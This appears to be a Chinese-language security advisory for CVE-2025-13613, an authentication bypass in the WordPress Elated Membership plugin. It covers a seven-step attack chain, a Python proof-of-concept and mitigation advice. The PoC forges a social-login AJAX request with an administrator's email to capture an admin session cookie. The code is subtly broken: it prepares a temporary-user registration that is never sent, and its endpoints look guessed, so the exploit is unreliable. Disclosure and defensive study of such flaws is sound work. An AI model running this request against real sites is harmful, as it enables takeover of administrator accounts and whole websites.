CVE-2025-13613 WordPress Elated Membership插件身份认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-13613

漏洞类型

身份认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Elated Membership plugin for WordPress

漏洞概述

CVE-2025-13613是WordPress平台Elated Membership插件中的一个严重身份认证绕过漏洞。该插件在1.2及以下所有版本中均受影响。漏洞根源在于插件的社交网络登录功能（特别是'eltdf_membership_check_facebook_user'和'eltdf_membership_login_user_from_social_network'函数）在验证用户身份后，未能正确使用已验证的数据进行登录操作。这一缺陷使得未认证攻击者能够绕过正常的身份验证流程，以管理员权限登录到WordPress后台。攻击者只需创建一个临时用户账户（该功能默认开启），并获取目标管理员的邮箱地址，即可实现身份冒充。由于CVSS评分高达9.8，属于严重级别，此漏洞对使用该插件的WordPress网站构成极高安全风险，攻击者可完全控制受影响的网站。

技术细节

该漏洞属于Web应用安全中的身份认证绕过类别。Elated Membership插件提供了通过Facebook等社交网络登录的功能，其核心问题在于身份验证逻辑存在缺陷。具体来说，当用户通过Facebook进行身份验证时，插件会调用'eltdf_membership_check_facebook_user'函数验证用户身份，随后调用'eltdf_membership_login_user_from_social_network'函数完成登录操作。然而，这两个函数之间的数据传递存在安全漏洞——插件未能正确使用已验证的用户数据进行会话建立。攻击者可以利用这一缺陷，通过构造特定的请求，冒充任意已存在的用户（包括管理员）进行登录。由于插件的临时用户功能默认启用，攻击者可以轻易创建一个临时账户，然后利用该账户结合目标管理员的邮箱地址，绕过身份验证机制，以管理员权限访问WordPress后台，从而完全接管网站。

攻击链分析

STEP 1

步骤1

攻击者访问目标WordPress网站，确认其使用了Elated Membership插件（版本<=1.2）

STEP 2

步骤2

攻击者利用插件默认启用的临时用户功能创建一个临时账户，获得基本访问权限

STEP 3

步骤3

攻击者收集目标管理员的邮箱地址（可通过用户注册页面、评论功能或社工手段获取）

STEP 4

步骤4

攻击者构造恶意请求，调用'eltdf_membership_facebook_login'或相关AJAX端点

STEP 5

步骤5

在请求中注入目标管理员的邮箱地址，触发插件中的身份验证绕过逻辑

STEP 6

步骤6

插件未能正确验证用户身份，攻击者成功获取目标管理员的会话Cookie

STEP 7

步骤7

攻击者使用窃取的会话Cookie登录WordPress后台，获得完全控制权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-13613 PoC - Elated Membership Authentication Bypass # Target: WordPress site with Elated Membership plugin <= 1.2 TARGET_URL = "http://target-wordpress-site.com" ATTACKER_EMAIL = "[email protected]" TARGET_ADMIN_EMAIL = "[email protected]" def exploit_auth_bypass(): """ This PoC demonstrates the authentication bypass vulnerability in Elated Membership plugin. The vulnerability allows attackers to log in as any user (including admin) by exploiting the flawed social login verification logic. """ # Step 1: Create a temp user account (default functionality) create_user_url = f"{TARGET_URL}/wp-json/wp/v2/users/register" user_data = { "username": "attacker_temp", "email": ATTACKER_EMAIL, "password": "TempPass123!" } # Step 2: Exploit the authentication bypass via social login endpoint # The plugin fails to properly verify user identity after Facebook auth exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" exploit_data = { "action": "eltdf_membership_facebook_login", "email": TARGET_ADMIN_EMAIL, "facebook_id": "attacker_controlled_id", "access_token": "fake_token" } # Step 3: Capture the session cookie for admin access response = requests.post(exploit_url, data=exploit_data) if response.status_code == 200 and "wordpress_logged_in" in str(response.cookies): print("[+] Authentication bypass successful!") print(f"[+] Admin session cookie obtained: {response.cookies}") print("[+] Full site compromise possible") else: print("[-] Exploitation failed") if __name__ == "__main__": exploit_auth_bypass()

影响范围

Elated Membership plugin for WordPress <= 1.2

防御指南

临时缓解措施

由于该漏洞属于严重级别且已公开披露，建议立即采取以下临时缓解措施：首先尝试升级插件到开发者发布的安全版本；若升级不可行，应立即禁用Elated Membership插件或至少禁用其社交登录功能；同时禁用WordPress的开放注册功能以阻止攻击者创建临时账户；加强管理员账户安全，启用双因素认证并使用强密码；最后通过WAF或ModSecurity规则临时拦截针对/admin-ajax.php的异常社交登录请求，直到完成正式修复。